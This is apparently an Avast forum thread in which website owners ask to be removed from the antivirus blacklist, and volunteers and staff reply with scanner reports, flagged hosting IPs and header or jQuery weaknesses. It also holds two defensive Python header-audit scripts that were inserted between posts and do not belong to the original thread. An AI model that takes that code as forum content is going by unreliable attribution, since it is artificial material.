https://transparencyreport.google.com/safe-browsing/search?url=d3ipinc.com

http://www.urlvoid.com/scan/d3ipinc.com/
Title: Re: How to remove my website from your blacklist?
Post by: LukasJ on April 04, 2018, 08:15:08 PM
Hi,
domain d3ipinc was removed from blacklist.

Lukas
Title: Re: How to remove my website from your blacklist?
Post by: admin232 on April 04, 2018, 09:11:31 PM
thank you!
Title: Re: How to remove my website from your blacklist?
Post by: Marc259 on April 05, 2018, 12:28:10 PM
My domain 50shadesofmagic.co.za appears blocked by avast.  I have deleted the entire site and replaced it with some simple content, but it is still blocked.

Please can someone have a look at unblocking it?
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on April 06, 2018, 02:27:58 AM
My domain 50shadesofmagic.co.za appears blocked by avast.  I have deleted the entire site and replaced it with some simple content, but it is still blocked.

Please can someone have a look at unblocking it?

Hi.

hxxp://www.50shadesofmagic.co.za  is blacklisted by google as phishing.

https://transparencyreport.google.com/safe-browsing/search?url=www.50shadesofmagic.co.za

IP 69.89.31.122 has been reported in phishtank and host malicious domains

https://www.phishtank.com/phish_detail.php?phish_id=314083

https://www.scumware.org/report/69.89.31.122

Title: Re: How to remove my website from your blacklist?
Post by: polonus on April 07, 2018, 01:07:00 PM
Minimize the security risks of this Utah hosted website, as follows:

Apparently the website is hosted on a compromised server.
IP Address: -69.89.31.122 United States United States
Hosting Service: Unified Layer
Hosting City: Provo
Hosting Region: UT
Hosting Postal: 84606  Risk rating 7 red out of 10: https://toolbar.netcraft.com/site_report?url=50shadesofmagic.co.za

Nameserver IP: -162.159.25.175
Target : -ns2.bluehost.com
Country: United States
Nameserver 0 IP: 162.159.25.175
Target : ns2.bluehost.com

Your site is susceptible to MiM attacks, easier exploitable because the X-Powered-By header is exposed (info proliferation we call this,
like http-server-header: nginx/1.12.2, Exim smtpd 4.89_1 via port 26);

HttpOnly cookies not used, so vulnerable to cross-site attacks;

SPF not enabled, so emails can be fraudulently sent.

2 vulnerable jQuery libraries detected: https://retire.insecurity.today/#!/scan/90cb38781e94150039657fcd67bb26891643a55a04b944242d477a04225

polonus (volunteer website security analyst and website error-hunter)

P.S. A final verdict should be given by an avast team member, as they are the only ones to unblock.

We are just volunteers here with relevant knowledge and work towards better website security awareness
and adoption of best policy recommendations.
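
The three findings in the post above (version-bearing response headers, cookies set without HttpOnly, no SPF record) can be re-checked after hardening. The following is an added example, not part of the original post: it audits a response head and a list of DNS TXT strings. Function names, verdict labels and both sample responses are constructed for illustration; only the `nginx/1.12.2` value comes from the post.

```python
import re

VERSION_RE = re.compile(r"\d+(?:\.\d+)+")   # dotted version such as 1.12.2


def parse_headers(raw):
    """Return [(lower-case name, value)] from a raw HTTP response head."""
    lines = raw.replace("\r\n", "\n").split("\n")
    headers = []
    for line in lines[1:]:                  # lines[0] is the status line
        if not line.strip():
            break                           # blank line ends the header block
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return headers


def audit_headers(raw):
    """Flag software disclosure and cookies that scripts can read."""
    findings = []
    for name, value in parse_headers(raw):
        if name == "x-powered-by":
            findings.append(("x-powered-by-exposed", value))
        elif name == "server" and VERSION_RE.search(value):
            findings.append(("server-version-exposed", value))
        elif name == "set-cookie":
            cookie, *attrs = value.split(";")
            flags = {a.strip().lower() for a in attrs}
            if "httponly" not in flags:
                findings.append(("cookie-without-httponly",
                                 cookie.split("=", 1)[0].strip()))
    return findings


def spf_status(txt_records):
    """Classify the SPF policy found in a domain's TXT strings."""
    spf = [t for t in txt_records
           if t.lower() == "v=spf1" or t.lower().startswith("v=spf1 ")]
    if not spf:
        return "missing"                    # nothing tells receivers who may send
    if len(spf) > 1:
        return "multiple"                   # RFC 7208: more than one record is an error
    terms = spf[0].lower().split()[1:]
    for term, verdict in (("-all", "hardfail"), ("~all", "softfail"),
                          ("?all", "neutral"), ("+all", "allow-all"),
                          ("all", "allow-all")):
        if term in terms:
            return verdict
    return "no-all"                         # no catch-all term: unlisted senders are not rejected


# Constructed response heads: one with the weaknesses named in the post,
# one after hardening.
SAMPLE_RESPONSE = "\r\n".join([
    "HTTP/1.1 200 OK",
    "Server: nginx/1.12.2",
    "X-Powered-By: PHP/5.6.40",
    "Set-Cookie: PHPSESSID=abc123; path=/",
    "Set-Cookie: lang=en; Path=/; Secure; HttpOnly",
    "Content-Type: text/html",
]) + "\r\n\r\n"

HARDENED_RESPONSE = "\r\n".join([
    "HTTP/1.1 200 OK",
    "Server: nginx",
    "Set-Cookie: PHPSESSID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax",
    "Content-Type: text/html",
]) + "\r\n\r\n"

if __name__ == "__main__":
    for label, raw in (("before", SAMPLE_RESPONSE), ("after", HARDENED_RESPONSE)):
        print(label, audit_headers(raw))
    print("SPF:", spf_status(["google-site-verification=constructed"]))
    print("SPF:", spf_status(["v=spf1 mx -all"]))
```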
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on April 09, 2018, 10:21:12 PM
My domain 50shadesofmagic.co.za appears blocked by avast.  I have deleted the entire site and replaced it with some simple content, but it is still blocked.

Please can someone have a look at unblocking it?

Hello.

Use the link if there is a problem

https://www.avast.com/false-positive-file-form.php

it is blocked await time required

Quote from: Avast
Our virus specialists have now cleared its reputation in our database.
With URLs this change should be instant, but it might take up to 24 hours with files. For future reference you might also find the following article to be useful: Avast Clean Guidelines (https://support.avast.com/en-us/article/228/).

URL has been removed from detection. : )
Title: Re: How to remove my website from your blacklist?
Post by: Rodrigo_ on June 17, 2018, 03:01:25 PM
My Blog is blocked in avast

hxxps://neoplayerpodcast.blogspot[.]com


Title: Re: How to remove my website from your blacklist?
Post by: Pondus on June 17, 2018, 03:57:41 PM
My Blog is blocked in avast

https://neoplayerpodcast.blogspot.com
Avast is not the only one that doesn't like it

Blacklisted
https://www.virustotal.com/#/url/a0ed422a01e46c24bdde4cdba511e12ea1530c3f34655f5e4b6fb2a87e394c66/detection

https://www.UnmaskParasites.com/security-report/?page=neoplayerpodcast.blogspot.com

Also listed by TrendMicro  https://global.sitesafety.trendmicro.com/



Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 17, 2018, 04:45:04 PM
Also given as PHISHING website here: https://urlquery.net/report/330ab94f-caa5-4f5a-825a-53588517483c

Redirects and alerts see here: https://aw-snap.info/file-viewer/?protocol=secure&tgt=neoplayerpodcast.blogspot.com&ref_sel=GSP2&ua_sel=ff&fs=1

The block of script at line 735 looks suspicious! Check to make sure it is legit.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Rodrigo_ on June 24, 2018, 07:27:31 AM
Also given as PHISHING website here: https://urlquery.net/report/330ab94f-caa5-4f5a-825a-53588517483c

Redirects and alerts see here: https://aw-snap.info/file-viewer/?protocol=secure&tgt=neoplayerpodcast.blogspot.com&ref_sel=GSP2&ua_sel=ff&fs=1

The block of script at line 735 looks suspicious! Check to make sure it is legit.

polonus



I changed the template because of this error.
and now RedLeg is ticking everything right

https://aw-snap.info/file-viewer/?protocol=secure&tgt=neoplayerpodcast.blogspot.com%2F&ref_sel=GSP2&ua_sel=ff&fs=1


Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 24, 2018, 01:02:40 PM
Wait for an avast team member to turn up (probably after the weekend) to unblock, as they are the only ones to do that.
We here are just volunteers with relevant knowledge.
So wait for a final verdict on your website.

When it comes unblocked it is often with an oncoming streaming update of the avast solution.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: José532 on June 25, 2018, 05:34:07 AM
I need to remove my site from the blacklist.
I cleaned and removed the strange directories.

My site is hxxp://www.solarmas[.]com[.]ar

Thanks
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on June 25, 2018, 09:56:28 AM
I have removed neoplayerpodcast.blogspot[.]com from our blacklist.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on June 25, 2018, 09:58:04 AM
Nice to hear the phishing has been removed - I am removing solarmas[.]com[.]ar from our blacklist.
Title: Re: How to remove my website from your blacklist?
Post by: Александр562 on July 02, 2018, 05:25:54 PM
please remove our website from blacklist hxxps://login.hma.ecvi[.]ru/
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 02, 2018, 06:50:39 PM
Hello Александр562,

Re: https://sitecheck.sucuri.net/results/login.hma.ecvi.ru/
Critical security risk: Your site is blacklisted and needs immediate attention.
Web authorities are blocking traffic because your website is unsafe for visitors.
Sign up to secure your site with guaranteed malware and blacklist removal of some sort.

Error in code here:
Quote
-login.hma.ecvi.ru/assets/ecvi/js/plugins/jquery/jquery-1.9.1.min.js?1530549559
     status: (referer=XXX)saved 92629 bytes ae49e56999d82802727455f0ba83b63acd90a22b
     info: ActiveXDataObjectsMDAC detected Microsoft.XMLHTTP
     info: [decodingLevel=0] found JavaScript
     error: undefined function d.getElementsByTagName
     error: undefined variable d
     info: [element] URL=-login.hma.ecvi.ru/assets/ecvi/js/plugins/jquery/undefined
     info: [1] no JavaScript
     file: ae49e56999d82802727455f0ba83b63acd90a22b: 92629 bytes
     file: d5dba94a76a67a54f2b98b16227da20414542fd9: 72 bytes

jQuery@1.9.1 has 1 known vulnerabilities (1 medium). See https://snyk.io/vuln/npm:jquery for more information.
-https://login.hma.ecvi.ru/login

Consider: https://aw-snap.info/file-viewer/?protocol=secure&tgt=login.hma.ecvi.ru%2Flogin&ref_sel=GSP2&ua_sel=ff&fs=1

114 security issues:
x-content-type-options: 36 errors

validate-set-cookie-header: 2 errors

strict-transport-security: 38 errors

sri: 36 errors

no-vulnerable-javascript-libraries: 1 error

ssllabs: 1 error
according to: https://sonarwhal.com/scanner/8fbbdf6e-7548-40c4-937b-3c47b8f24a57

Wait for an avast team member to comment on the security risk of your site and whether it demands a continuous blocking.

We are just volunteers here with relevant knowledge, but only avast team members can come and unblock,

Regards,

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: JudasPerge on July 02, 2018, 09:06:34 PM
Hello,

Someone can help me ?

I checked my site : cubeofsteel[.]com , with VirusTotal and another scan.
https://www.virustotal.com/#/url/27dc8058a3f231654b96ac695ebab6f34097f7156330c9b13ce52e5b9457f00e/detection

All results say it's safe.

But we're blacklisted from Avast and we don't know why.

Can someone remove the site from your blacklist?

Thank you very much !

Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 02, 2018, 10:41:30 PM
Probably blocked because of a general IP block for domains on 163.172.32.234 for malware from site(s),
that shares this address with your domain:
https://www.threatminer.org/host.php?q=163.172.32.234

Also consider: https://www.malwares.com/report/ip?ip=163.172.32.234
and https://www.threatcrowd.org/ip.php?ip=163.172.32.234

Wait for an avast team member to give a final verdict, as we are just volunteers with relevant knowledge,
but only avast team members can unblock when a site does not pose any threat.
Also: https://www.threatcrowd.org/domain.php?domain=forum.cubeofsteel.com

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 03, 2018, 06:38:44 AM
Hi Александр562,
We do not seem to block hxxps://login.hma.ecvi[.]ru/ now. If you still get the warnings, please post a printscreen.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 03, 2018, 06:41:18 AM
Hi JudasPerge,
cubeofsteel[.]com was indeed blocked because 163.172.32[.]234 was blocked (spread Andromeda malware in the past). I am unblocking the IP now, but please consider a dedicated IP.
Title: Re: How to remove my website from your blacklist?
Post by: JudasPerge on July 03, 2018, 09:02:51 AM
Hello HonzaZ and Polonus,

Thanks a lot for your help !

Have a nice day.
Title: Re: How to remove my website from your blacklist?
Post by: Александр562 on July 03, 2018, 09:13:06 AM
Hello, HonzaZ.
It seems we are ( hxxps://login.hma.ecvi[.]ru/ )  still blocked. Also we have avast business antivirus version.

IMG here https://cloud.mail.ru/public/7EAZ/QiMYCR9tC

Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 03, 2018, 09:28:10 AM
I have disabled another detection on login.hma.ecvi[.]ru/login, hopefully it will be okay in a couple of minutes!
Title: Re: How to remove my website from your blacklist?
Post by: Александр562 on July 03, 2018, 10:25:37 AM
HonzaZ, thx works fine!
Title: Re: How to remove my website from your blacklist?
Post by: Seppi on July 03, 2018, 03:47:13 PM
Hi all

Avast for Windows shows our website to be malicious. But we checked several times using local scans as well as external ones:

https://www.virustotal.com
http://zulu.zscaler.com
http://dnscheck.pingdom.com
http://www.siteadvisor.com

None of those showed a problem with our site. Also tried to send a deblock request to Avast, but they ignored it multiple times now. What should we do?

Thanks & regards
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on July 03, 2018, 03:51:10 PM
Hi all

Avast for Windows shows our website to be malicious. But we checked several times using local scans as well as external ones:

https://www.virustotal.com
http://zulu.zscaler.com
http://dnscheck.pingdom.com
http://www.siteadvisor.com

None of those showed a problem with our site. Also tried to send a deblock request to Avast, but they ignored it multiple times now. What should we do?

Thanks & regards
And the website in question is ???
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 03, 2018, 06:42:46 PM
Hi Seppi,

Yes, curious to give it the 3rd party quick and dirty, give the link broken like htxp/htxps or -http or -https or . = dot etc.
and we see whether we can establish what caused the malware alert(s)? Is it hosted at afraid dot org for instance, that could be a reason your sub-domains aren't your sub-domains anymore  ;) and for avast alerts.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Rospez on July 03, 2018, 07:26:39 PM
Hello,
I have an url (not the whole site) that is being blocked for URL:Mal
The page is hxxp://wxw.ik3qar[.]it/software/qarteXt_ita/download/QARTeXt_ITA_Setup.php

Adding at the end the GET params ?d=ok it should start software download (that's my software), while without params it is a redirect to the previous page. In both cases it is detected as a URL:Mal

Can you check for it ?
Thanks!
Title: Re: How to remove my website from your blacklist?
Post by: suporte68 on July 04, 2018, 05:22:56 PM
Hi Avast,

We are an ecommerce solutions provider and some of our clients are being flagged as phishing sites:
ibramacelastic.conexaossl.com.br
elasticibramac.conexaossl.com.br
barzel.conexaossl.com.br

We believe that it's a mistake due to the use of a wildcard SSL in their stores.

Could you please remove them from the blacklist?
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 04, 2018, 09:15:35 PM
Hi suporte68,

Just dove into one of these domains,

Re: https://aw-snap.info/file-viewer/?protocol=not-secure&tgt=barzel.conexaossl.com.br&ref_sel=GSP2&ua_sel=ff&fs=1
Re: low security risk given: https://sitecheck.sucuri.net/results/barzel.conexaossl.com.br
Two warnings and an error:fail -> https://sitecheck.sucuri.net/results/barzel.conexaossl.com.br
Two retirable jQuery libraries detected: https://retire.insecurity.today/#!/scan/d55cc763e4906344d62079952c39c3f1412c60bfeaa661ae008c6bdfa1d0ff17
77 security issues (important and minor issues): https://sonarwhal.com/scanner/11a46790-27a3-49d8-b366-e9d130a69e3c
F-grade status and recommendations: https://observatory.mozilla.org/analyze/barzel.conexaossl.com.br
Netcraft risk rating 1 red out of 10: https://toolbar.netcraft.com/site_report?url=barzel.conexaossl.com.br

Let these websites run https://certbot.eff.org/ to properly enable HTTPS on their websites.

Just wait for a final verdict from an avast team member as they are the only ones to come and unblock.

We here are just volunteers with relevant knowledge through 3rd party cold reconnaissance website security analysis.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 04, 2018, 09:26:46 PM
To Rospez,

This is what heuristical scanning turns out at VT -> https://www.virustotal.com/#/domain/www.ik3qar.it
Probably blocked as a PHISHING detection by Avira's: https://www.virustotal.com/#/url/82d6ad6bbeaa42a8e9b94f5bfe136f614468844246ee0f7fbbd7f825aa9d2f76/detection

Consider: https://observatory.mozilla.org/analyze/ik3qar.it

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: Rospez on July 05, 2018, 10:17:29 AM
Thanks Polonus,
most (all) of the warnings shown are old, and the link which was potentially subject to SQLInjection was removed, others were fixed.

I still don't know  the reason of the virus warning, but following my false-positive form fill, warnings were removed and recognized as false positive.

Thanks for help!
Title: Re: How to remove my website from your blacklist?
Post by: Seppi on July 06, 2018, 09:24:08 AM
Hi all

Avast for Windows shows our website to be malicious. But we checked several times using local scans as well as external ones:

https://www.virustotal.com
http://zulu.zscaler.com
http://dnscheck.pingdom.com
http://www.siteadvisor.com

None of those showed a problem with our site. Also tried to send a deblock request to Avast, but they ignored it multiple times now. What should we do?

Thanks & regards
And the website in question is ???

Hi, sorry, here it is: hxxps://wildagzug[.]ch/

Still blocked at Avast ... an idea, anyone?
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 06, 2018, 02:56:09 PM
It is a general IP detection for your IP caused by another domain sharing the same IP that has been infested: https://urlquery.net/report/7755d347-6acd-4b44-83f6-501812258b79

As your domain does not seem to spread malware: https://aw-snap.info/file-viewer/?protocol=secure&tgt=wildagzug.ch%2F&ref_sel=GSP2&ua_sel=ff&fs=1

Ask for unblocking your domain by an avast team member.
We here are just volunteers with relevant knowledge, but only avast team can come and unblock.

Some improvements you can make with 134 security glitches:
See: https://sonarwhal.com/scanner/5109397b-af5a-4da7-86cf-9ec4994ae1df
F-status and recommendations here: https://observatory.mozilla.org/analyze/wildagzug.ch

Also consider scan results here: https://www.htbridge.com/websec/?id=0Dchzc6R
also: https://asafaweb.com/Scan?Url=https%3A%2F%2Fwildagzug.ch

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 09, 2018, 09:49:39 AM
Rospez, ik3qar[.]it/software/qartest_ita/download/qartest_ita_setup.php was unblocked 04.07., 11:08 CEST.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 09, 2018, 09:53:15 AM
suporte68, I have removed the following from our blacklist:

bezerraenxovais[.]conexaossl[.]com[.]br
elasticibramac[.]conexaossl[.]com[.]br
barzel[.]conexaossl[.]com[.]br
silviaarmarinho[.]conexaossl[.]com[.]br
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 09, 2018, 09:55:18 AM
Seppi, wildagzug[.]ch is not blocked. Can you post a printscreen of the detection?
Title: Re: How to remove my website from your blacklist?
Post by: slaw3k on July 09, 2018, 03:41:25 PM
Could you help me with this one? Link has been blocked with URL:MAL.
The link is hxxp://www.reset2[.]pl/Service/R2firma/10.1/update.exe

I checked the link and it looks clean:
1. https://www.virustotal.com/en/url/0f210739e5985a219103ddb44a3ca8149cf101940888b2577d4259a18c7540fd/analysis/1531143334/
2. https://transparencyreport.google.com/safe-browsing/search?url=http:%2F%2Fwww.reset2.pl%2FService%2FR2firma%2F10.1%2Fupdate.exe

Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 09, 2018, 09:31:47 PM
Hello,

This detection could have been IP related, also consider detections here:
-> https://urlquery.net/report/cf987501-337c-4ca9-a7ca-cbb1d2439b56
blacklisted by Fortinet's.  Suspicious: maxruntime exceeded 10 seconds,
e.g. in wXw.reset2.pl/js/sifr/sifr.js
error in
Quote
wXw.reset2.pl/js/jquery/jquery.ifixpng2.js benign
[nothing detected] (script) wXw.reset2.pl/js/jquery/jquery.ifixpng2.js
     status: (referer=wXw.reset2.pl/)saved 5941 bytes d808ecda01a0902e000b945e4592ab638fb80662
     info: [decodingLevel=0] found JavaScript
     error: undefined variable jQuery
     error: undefined variable $.ifixpng
     error: line:1: SyntaxError: missing ; before statement:
          error: line:1: var $.ifixpng = 1;
          error: line:1: ....^
More code errors, check with compiler for
Quote
line:4: SyntaxError: missing ; before statement:
and
Quote
  wXw.reset2.pl/js/main.js
     status: (referer=wXw.reset2.pl/)saved 14605 bytes da59826b829256199c1c93e0a959a2ed9e433a08
     info: [decodingLevel=0] found JavaScript
     error: undefined variable $
     error: undefined function $
     file: da59826b829256199c1c93e0a959a2ed9e433a08: 14605 bytes

Furthermore see the nine security related issues here: https://sonarwhal.com/scanner/96c01d0d-0504-4d89-8455-c3e0f03ce598

jQuery issue: -http://www.reset2.pl/
Detected libraries:
jquery - 1.3.2 : (active1) -http://www.reset2.pl/js/jquery/jquery-1.3.2.min.js
Info: Severity: medium
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4969
http://research.insecurelabs.org/jquery/test/
https://bugs.jquery.com/ticket/9521
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
(active) - the library was also found to be active by running code
1 vulnerable library detected

Wait for an avast team member to give a final verdict on detection.
We here are just volunteers with relevant knowledge, but cannot come to unblock.

Remember however avast is not the only solution that flags website for malcode,
re: https://urlquery.net/report/cf987501-337c-4ca9-a7ca-cbb1d2439b56

Regards,

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: Seppi on July 10, 2018, 10:52:09 AM
Seppi, wildagzug[.]ch is not blocked. Can you post a printscreen of the detection?

Ok, thanks. We'll check again.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 10, 2018, 11:07:15 AM
slaw3k, I do not see any detection, and can download the file without any problem. Can you post a printscreen of the detection?
Title: Re: How to remove my website from your blacklist?
Post by: Capitão_Caverna on July 11, 2018, 01:50:56 AM
Some users on my site are receiving Avast phishing alerts on the following page: https://bj-share.info/torrents.php

I looked for any kind of threat and I did not find it, can you help me?
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 11, 2018, 01:19:51 PM
No alerts given here: https://urlquery.net/report/d09c409e-7090-4e46-b64f-a55309a7c298
neither here: https://sitecheck.sucuri.net/results/bj-share.info/torrents.php
Could be this returned - Google Chrome returned code 301 to -https://bj-share.info/torrents.php
& GoogleBot returned code 301 to -https://bj-share.info/torrents.php

The alert could be for
Quote
GET /1/6d5c2d0121?a=144088729&v=1071.385e752&to=M1EEZhNTCEFUUxFaVwobM0AIHQpdUlkLHUgMRA%3D%3D&rst=773&ref=htxps://bj-share.info/login.php&ap=3&fe=654&dc=515&at=HxYHEFtJG08%3D&jsonp=NREUM.setToken HTTP/1.1
Host: -bam.nr-data.net
, which has been blocked for me by uMatrix script blocker.

For security glitches see: https://sonarwhal.com/scanner/19b3cac9-b306-4132-9fe9-6421b33ddfac
like
Quote
validate-set-cookie-header: 2 errors

ERROR
'set-cookie' header to set 'phpsessid' doesn't have the 'secure' directive.
-https://bj-share.info/login.php
ERROR
'set-cookie' header to set 'phpsessid' doesn't have the 'httponly' directive.
-https://bj-share.info/login.php

&
strict-transport-security: 2 errors

ERROR
'strict-transport-security' header was not specified
-https://bj-share.info/login.php
ERROR
'strict-transport-security' header was not specified
-https://bj-share.info/favicon.ico
&

ERROR
jQuery@1.8.2 has 2 known vulnerabilities (2 medium). See https://snyk.io/vuln/npm:jquery for more information.
-https://bj-share.info/login.php

Whenever this site is really being blocked by avast's, wait for a reaction from an avast team member,
as they are the only ones that can come and unblock. We are just volunteers with relevant knowledge.

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
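The header findings quoted in the post above (`validate-set-cookie-header`, `strict-transport-security`) and the `x-content-type-options` errors listed earlier in the thread can be reproduced offline. This is an added example, not code from the thread or from the scanner it links to; the sample headers are constructed and the function names are hypothetical.

```python
"""Offline audit of response headers for the findings quoted in the thread."""

# Constructed sample response (not captured from any site named in the thread).
SAMPLE_HEADERS = [
    ("Content-Type", "text/html; charset=UTF-8"),
    ("Set-Cookie", "PHPSESSID=abc123; path=/"),
    ("Set-Cookie", "lang=en; Path=/; Secure; HttpOnly"),
]

# The same constructed response after the fixes the scanner asks for.
HARDENED_HEADERS = [
    ("Content-Type", "text/html; charset=UTF-8"),
    ("Set-Cookie", "PHPSESSID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("X-Content-Type-Options", "nosniff"),
]


def parse_set_cookie(value):
    """Return (cookie_name, set of lower-cased attribute names)."""
    parts = [p.strip() for p in value.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {p.split("=", 1)[0].strip().lower() for p in parts[1:]}
    return name, attrs


def hsts_max_age(value):
    """Return max-age in seconds from an HSTS value, or None if absent or invalid."""
    for directive in value.split(";"):
        key, _, val = directive.strip().partition("=")
        if key.lower() == "max-age":
            val = val.strip().strip('"')
            return int(val) if val.isdigit() else None
    return None


def audit_headers(headers, https=True):
    """Return a list of (rule, detail) findings for one response.

    `https` says whether the response arrived over TLS: Secure and HSTS are
    only meaningful there, because browsers ignore HSTS sent over plain HTTP.
    """
    findings = []
    by_name = {}
    for name, value in headers:
        # Header names are case-insensitive; Set-Cookie may repeat.
        by_name.setdefault(name.lower(), []).append(value)

    for raw in by_name.get("set-cookie", []):
        cookie, attrs = parse_set_cookie(raw)
        if https and "secure" not in attrs:
            findings.append(("validate-set-cookie-header", f"{cookie}: missing Secure"))
        # HttpOnly matters most for session cookies, which scripts never need to read.
        if "httponly" not in attrs:
            findings.append(("validate-set-cookie-header", f"{cookie}: missing HttpOnly"))

    if https:
        hsts = by_name.get("strict-transport-security")
        if not hsts:
            findings.append(("strict-transport-security", "header not specified"))
        elif not hsts_max_age(hsts[0]):
            # max-age=0 tells the browser to forget the policy, so it is flagged too.
            findings.append(("strict-transport-security", "max-age missing or zero"))

    xcto = [v.strip().lower() for v in by_name.get("x-content-type-options", [])]
    if xcto != ["nosniff"]:
        findings.append(("x-content-type-options", "expected the single value 'nosniff'"))
    return findings


if __name__ == "__main__":
    for rule, detail in audit_headers(SAMPLE_HEADERS):
        print(f"{rule}: {detail}")
```

Feed it the header list from a saved response of your own site to recheck after a configuration change.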
Title: Re: How to remove my website from your blacklist?
Post by: LukasJ on July 11, 2018, 01:32:25 PM
Hi guys,
detection on bj-share[.]info will be fixed in next update

Lukas
Title: Re: How to remove my website from your blacklist?
Post by: ud0g on July 11, 2018, 05:08:44 PM
Dear Avast,

Our website has been flagged by Avast: hxxp://interfaith-wedding[.]org

I have checked it with virustotal.com and others but all show it as being clean.

Can you please remove it from the list?
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on July 11, 2018, 05:33:23 PM
Dear Avast,

Our website has been flagged by Avast: hxxp://interfaith-wedding[.]org

I have checked it with virustotal.com and others but all show it as being clean.

Can you please remove it from the list?
Virustotal does not scan websites for infections, it checks URLs against a number of blacklists

Seems to contain a javascript going to a blacklisted URL
https://sitecheck.sucuri.net/results/interfaith-wedding.org
http://labs.sucuri.net/db/malware/malware-entry-mwblk2

This blacklisted URL > freecontent.date
https://www.virustotal.com/#/url/f717dbb95288b8c900dc2143967fdaed757ec648fb097ba58fce58b9fb0d8567/detection



Title: Re: How to remove my website from your blacklist?
Post by: ud0g on July 11, 2018, 05:56:03 PM
Thank you for the guidance. I found a hidden "block" in Drupal that contained the offending URL.

The new scan results show the site as clean: https://sitecheck.sucuri.net/results/interfaith-wedding.org?clear

Is this sufficient to unblock it from Avast?
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on July 11, 2018, 06:04:55 PM
It also seems you have an outdated Drupal

Quote
Is this sufficient to unblock it from Avast?
Maybe, I will notify @HonzaZ .... check back tomorrow for a reply


you may also use this  >>  https://forum.avast.com/index.php?topic=14433.msg1289438#msg1289438

Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 18, 2018, 07:14:05 AM
We do not seem to block interfaith-wedding[.]org, if you are having problems, please post a printscreen.
Title: Re: How to remove my website from your blacklist?
Post by: Александр562 on July 19, 2018, 09:24:37 AM
Hi again, so after a few weeks our website is in the blacklist again hxxps://login.hma.ecvi[.]ru/
But we are clean https://www.virustotal.com/ru/url/15e8e2d46e1e9cc812374abfb1e36f5f394f6a98ef5ba1e77d2a498f6e3e749a/analysis/1531984850/
picture here: https://cloud.mail.ru/public/4pNz/SKapjfLsm
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 19, 2018, 09:34:33 AM
login.hma.ecvi[.]ru/login removed from our blacklist, shouldn't happen again. Time blocked today ~55 minutes.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on July 19, 2018, 03:52:21 PM
The same problem
Same as what?

If blocked website ... what website?

Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on July 19, 2018, 04:04:46 PM
The same problem
Same as what?

If blocked website ... what website?
Some folks think we are actually mind readers. :)
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 19, 2018, 04:37:29 PM
Hi bob3160,

Thanks for your reaction, my friend. Quite agree, we cannot do magic without knowing what to call up.  ;D  8)

Quite the same problem should not be posted, as that has already come unblocked now.
So the right or more appropriate term would be "a rather similar" problem.

Anything of a broken link like [hxtp://www dot site-with-similar-problem dot com] would be welcome to tackle the problem.

And my "mind reading crystal ball of experience" is only working through code (mostly JavaScript, HTML, like jQuery, json etc.)
(good code, suspicious code, malcode, vulnerable code, retirable code, any code for that matter, etc.). ;)

The final verdict will then always be given by an avast team member, as they are the ones that can come and unblock.
We here are just volunteers with relative knowledge and give you recommendations as how to make your site more secure.

Have a nice day,

polonus
Title: Re: How to remove my website from your blacklist?
Post by: JL20 on October 16, 2018, 03:16:11 PM
Hi !

I launched the website my-dcl [.] com, that has a simple react app running, with no form or whatsoever,

It has been detected as a phishing threat and is blocked without error thrown in browsers ?

Could you please help me to be out of the blacklist asap as communication is starting around the launch of this website ?

Also I would like to know what created the false positive in order to make any correction if needed

Thanks
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on October 16, 2018, 03:23:58 PM
Use the following to report your site:

Report a URL
https://www.avast.com/report-a-url.php
Title: Re: How to remove my website from your blacklist?
Post by: polonus on October 16, 2018, 06:07:12 PM
Blocked according to IP here: https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/firehol_proxies.netset
8 security hints for website: https://webhint.io/scanner/401648de-a0b0-4dac-8557-2a1ec5a60679
error
Quote
-my-dcl.com/static/js/main.96968a47.js
     status: (referer=XXX/web?q=puppies)saved 339437 bytes 22310c96195c3538a9a1daceacb1a580c718ce7e
     info: [decodingLevel=0] found JavaScript
